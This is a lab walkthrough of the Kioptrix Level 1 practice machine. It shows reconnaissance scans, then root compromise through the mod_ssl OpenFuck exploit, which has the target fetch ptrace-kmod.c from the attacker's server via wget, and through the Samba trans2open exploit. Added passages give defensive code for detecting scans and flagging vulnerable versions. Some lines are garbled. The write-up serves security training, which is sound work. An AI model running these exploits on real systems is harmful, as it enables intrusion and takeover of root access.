Kioptrix Level 1 Walkthrough
Statement
Any direct or indirect consequences and losses arising from the dissemination or use of the information in this article are the sole responsibility of the user; Leishen Crowd Testing (雷神众测) and the author accept no liability for them.
Leishen Crowd Testing retains the right to modify and interpret this article. If you repost or distribute it, you must keep it intact, including the copyright notice and all other content. Without permission from Leishen Crowd Testing, its content may not be altered, added to or shortened, nor used for commercial purposes in any way.
Walkthrough steps
1. First scan the subnet to find the target's IP
nmap subnet scan: nmap -sP xxxxxx/24
2. There is usually a web service; use nmap to discover the open web service(s)
nmap full scan: nmap -sS -sV -A -p- xxxxxx
3. Scan with directory enumeration tools
dirb, dirsearch, gobuster
dirb http://xxxxxxx -X .php,.txt,.zip,.html
python3 dirsearch.py -u http://xxxxxxx -e .php,.txt,.zip,.html
gobuster dir -u http://xxxxxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
Scanning with the three tools turned up a few directories; it is worth trying all three, since their wordlists and defaults differ.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.52.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,zip,php,txt
[+] Timeout:                 10s
===============================================================
2022/01/06 02:34:06 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2890]
/test.php (Status: 200) [Size: 27]
/manual (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
===============================================================
2022/01/06 02:39:27 Finished
===============================================================
Five paths were found; index.html is the default Apache test page.
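Seen from the server side, the enumeration step above is noisy: one client produces a burst of 404 responses while walking a wordlist, and gobuster's default User-Agent (gobuster/3.1.0 in the run above) announces the tool outright. The following is an added example, not part of the original write-up, of flagging both signals in Apache combined-format access logs. The log lines, client IPs and thresholds are constructed for the demonstration; the rate rule is the one that survives a changed User-Agent.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" access log layout (assumed); the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_enumeration(lines, window_seconds=60, threshold=20):
    """Return {client_ip: [reasons]} for clients that look like directory brute-forcers.

    Two signals: (1) at least `threshold` 404 responses inside a sliding window of
    `window_seconds`, and (2) a User-Agent that names the enumeration tool itself.
    """
    recent = defaultdict(deque)      # ip -> timestamps of 404s still inside the window
    alerts = defaultdict(list)
    reported = set()                 # (ip, kind) so each reason is emitted once per client
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                 # malformed line; a real pipeline would count these
        ip = rec["ip"]
        if rec["ua"].lower().startswith("gobuster/") and (ip, "ua") not in reported:
            reported.add((ip, "ua"))
            alerts[ip].append(f"scanner user-agent: {rec['ua']}")
        if rec["status"] != 404:
            continue
        q = recent[ip]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()              # drop 404s that fell out of the window
        if len(q) >= threshold and (ip, "rate") not in reported:
            reported.add((ip, "rate"))
            alerts[ip].append(f"{len(q)} x 404 within {window_seconds}s")
    return dict(alerts)


def sample_log():
    """Constructed sample: a normal visitor, a brute-forcer hiding behind a browser UA,
    and a short gobuster run that keeps its default User-Agent."""
    base = datetime.strptime("06/Jan/2022:02:34:06 -0500", TS_FMT)

    def fmt(ip, offset, path, status, ua):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 294 "-" "{ua}"'

    lines = [
        fmt("10.0.0.5", 0, "/index.html", 200, "Mozilla/5.0"),
        fmt("10.0.0.5", 5, "/favicon.ico", 404, "Mozilla/5.0"),
        fmt("10.0.0.5", 9, "/usage/", 301, "Mozilla/5.0"),
    ]
    # 25 misses in 25 seconds from one client with an ordinary browser User-Agent
    lines += [fmt("10.0.0.9", 10 + i, f"/word{i}", 404, "Mozilla/5.0") for i in range(25)]
    # three misses from a client that announces itself as gobuster
    lines += [fmt("10.0.0.7", 60 + i, f"/w{i}.php", 404, "gobuster/3.1.0") for i in range(3)]
    return lines


if __name__ == "__main__":
    for ip, reasons in detect_enumeration(sample_log()).items():
        print(ip, "->", "; ".join(reasons))
```

The window and threshold are deliberately conservative; a real wordlist run like the one above produces thousands of 404s in minutes, so the rate rule fires long before the scan finishes, whether or not the User-Agent was changed.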

The test.php page:

The /manual path reveals that mod_ssl is version 2.8.

The /usage/ path shows Webalizer Version 2.01.

Use rustscan or nikto to scan the ports and the exposed services.
rustscan scan: rustscan -u5000 -a192.168.52.135 -- -sC -sV -oA scan.log
Port 80 is Apache (version 1.3.20) with mod_ssl loaded, and port 111 is running rpcbind.
80/tcp  open  http        syn-ack ttl 64  Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
111/tcp open  rpcbind     syn-ack ttl 64  2 (RPC # 100000)
| rpcinfo:
|   program  version  port/proto  service
|   100000   2        111/tcp     rpcbind
|   100000   2        111/udp     rpcbind
|   100024   1        1024/tcp    status
|_  100024   1        1024/udp    status
139/tcp open  netbios-ssn syn-ack ttl 64  Samba smbd (workgroup: MYGROUP)
443/tcp open  ssl/https   syn-ack ttl 64  Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain
nikto scan: nikto -host xxxxx
nikto reports that the Apache server loads mod_ssl 2.8.4 and flags that version as affected by a remote buffer overflow with a public exploit.
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.52.135
+ Target Hostname: 192.168.52.135
+ Target Port: 80
+ Start Time: 2022-01-07 01:41:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site S
mod_ssl remote buffer overflow (remote code execution)
Search for an exploit with searchsploit mod_ssl; it lists several remote overflow exploits for mod_ssl 2.8.7 and below, so they are worth trying.

Pick 47080.c as the exploit to use.
Read the usage notes with head; it compiles directly with gcc: gcc -o OpenFuck OpenFuck.c -lcrypto
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* # hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
The exploit has to be edited first, though. During exploitation it downloads a second file, ptrace-kmod.c, and the URL hard-coded in the original no longer works. Download that file yourself (from https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c), serve it locally with python -m http.server, change the URL in 47080.c to your own server (http://192.168.52.137:8000/ptrace-kmod.c), and recompile: gcc -o OpenFuck 47080.c -lcrypto
ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; n"
Then start the local HTTP server:
% python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Run the compiled binary; it lists many target system types, so choose the one matching the target:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
Run it with the chosen target. If a -c value of 40 does not yield a root shell, increase it gradually.
./OpenFuck 0x6b 192.168.52.135 -c 40
Privilege escalation succeeded: the resulting shell runs as root.
% ./OpenFuck 0x6b 192.168.52.135 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* # hackarena irc.brasnet.org *
* TNX Xanthic USG # SilverLords # BloodBR # isotk # highsecure # uname *
* # ION # delirium # nitr0x # coder # root # endiabrad0s # NHC # TechTeam *
* # pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; -kmod.
--22:56:58-- http://192.168.52.137:8000/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.52.137:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
22:56:58 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
gcc: file path prefix `/usr/bin' never used
[+] Attached to 1368
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Samba remote code execution vulnerability
The rustscan/nmap results showed a Samba service. Use msf to fingerprint the Samba version; it turns out to be Samba 2.2.1a.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.52.135
rhosts => 192.168.52.135
msf6 auxiliary(scanner/smb/smb_version) >
msf6 auxiliary(scanner/smb/smb_version) > run
192.168.52.135:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
192.168.52.135:139 - Host could not be identified: Unix (Samba 2.2.1a)
192.168.52.135: - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed
searchsploit samba 2.2.1a finds a remote code execution exploit that applies:
# searchsploit samba 2.2.1a
---------------------------------
Exploit Title | Path
---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------
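Both nikto's findings earlier and the searchsploit hit here come down to the same operation: pull a version string out of a banner and compare it against a known-affected range. The following added example (not from the original write-up) does that for the Server header and the Samba fingerprint shown on this page, using only the version boundaries the page itself reports (Apache 1.3 below 1.3.27 and 1.3.29, mod_ssl 2.8.7 and lower, Samba below 2.2.8). The rule table, the parsing and the handling of letter-suffixed versions such as 0.9.6b and 2.2.1a are my own; it is a triage aid for an asset inventory, not a replacement for checking the vendor's patched package versions.

```python
import re

# Affected ranges as stated in the nikto and searchsploit output on this page.
# (product, lowest affected or None, boundary, boundary_inclusive, reference)
RULES = [
    ("Apache",  "1.3", "1.3.27", False, "CAN-2002-0839 / OSVDB-4552: local buffer overflow"),
    ("Apache",  "1.3", "1.3.29", False, "CAN-2003-0542 / OSVDB-2733: mod_rewrite and mod_cgi overflows"),
    ("mod_ssl", None,  "2.8.7",  True,  "CVE-2002-0082 / OSVDB-756: remote buffer overflow"),
    ("Samba",   None,  "2.2.8",  False, "trans2open remote code execution (searchsploit multiple/remote/10.c)"),
]

# "Apache/1.3.20", "mod_ssl/2.8.4", "OpenSSL/0.9.6b" inside a Server header
BANNER_RE = re.compile(r"\b(Apache|mod_ssl|OpenSSL)/(\d[\w.]*)")
# "Unix (Samba 2.2.1a)" as printed by the smb_version scanner
SAMBA_RE = re.compile(r"\bSamba\s+(\d[\w.]*)")


def parse_version(ver):
    """'0.9.6b' -> ((0,''),(9,''),(6,'b')); a letter suffix sorts after the bare number,
    so 2.2.1a < 2.2.8 and 0.9.6b < 0.9.8zc, which matches how these projects number releases."""
    parts = []
    for piece in ver.split("."):
        m = re.fullmatch(r"(\d+)([A-Za-z]*)", piece)
        if not m:
            raise ValueError(f"unparseable version component: {piece!r}")
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)


def version_lt(a, b):
    return parse_version(a) < parse_version(b)


def version_le(a, b):
    return parse_version(a) <= parse_version(b)


def extract_components(text):
    """Return (product, version) pairs found in a banner or fingerprint line."""
    found = list(BANNER_RE.findall(text))
    found += [("Samba", v) for v in SAMBA_RE.findall(text)]
    return found


def triage(text):
    """Match every component in `text` against RULES; return (product, version, reference) hits."""
    hits = []
    for product, version in extract_components(text):
        pv = parse_version(version)
        for rule_product, low, boundary, inclusive, ref in RULES:
            if product != rule_product:
                continue
            if low is not None and pv < parse_version(low):
                continue                      # older branch the rule does not talk about
            bv = parse_version(boundary)
            if (pv <= bv) if inclusive else (pv < bv):
                hits.append((product, version, ref))
    return hits


if __name__ == "__main__":
    # Both inputs are the banners shown in this walkthrough.
    for banner in (
        "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
        "Unix (Samba 2.2.1a)",
    ):
        for product, version, ref in triage(banner):
            print(f"{product} {version}: {ref}")
```

The only judgement call is the ordering of suffixed versions; the parser treats "2.2.1a" as newer than "2.2.1" but older than "2.2.2", which is how Samba and OpenSSL used those suffixes. A distribution that backports fixes while keeping the upstream version number (Red Hat's apache-1.3.20-16 package in the target list above is such a case) will still be flagged by banner alone, so confirm against the package changelog before closing or opening a finding.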
Read the exploit header with head:
/*
Remote root exploit for Samba 2.2.x and prior that works against
Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and
OpenBSD (2.x, 3.x and 3.2 non-executable stack).
sambal.c is able to identify samba boxes. It will send a netbios
name packet to port 137. If the box responds with the mac address
00-00-00-00-00-00, it's probally running samba.
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Compile it to an executable, then run it.
gcc -g -o samba2root 10.c
Run the exploit against the target to obtain a shell:
./samba2root -d 0 -C 60 -S 192.168.93.134
Second method: exploit it with msf
use exploit/linux/samba/trans2open
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell_bind_tcp
msf6 exploit(linux/samba/trans2open) > set rhosts 192.168.93.134
msf6 exploit(linux/samba/trans2open) > run
[*] 192.168.93.134:139 - Trying return address 0xbffffdfc...
[*] Started bind TCP handler against 192.168.93.134:4444
[*] 192.168.93.134:139 - Trying return address 0xbffffcfc...
[*] 192.168.93.134:139 - Trying return address 0xbffffbfc...
[*] 192.168.93.134:139 - Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 192.168.93.134
[*] 192.168.93.134:139 - Trying return address 0xbffff9fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff8fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff7fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff6fc...
[*] 192.168.93.134:139 - Trying return address 0xbffff5fc...
[*] Command shell session 2 opened (192.168.93.129:34145 -> 192.168.93.134:4444 ) at 2022-02-26 12:45:53 +0800
id
uid=0(root) gid=0(root) groups=99(nobody)
Source: Leishen Crowd Testing (雷神众测)
Original article by mOon; if you repost it, credit the source: https://www.moonsec.com/3866.html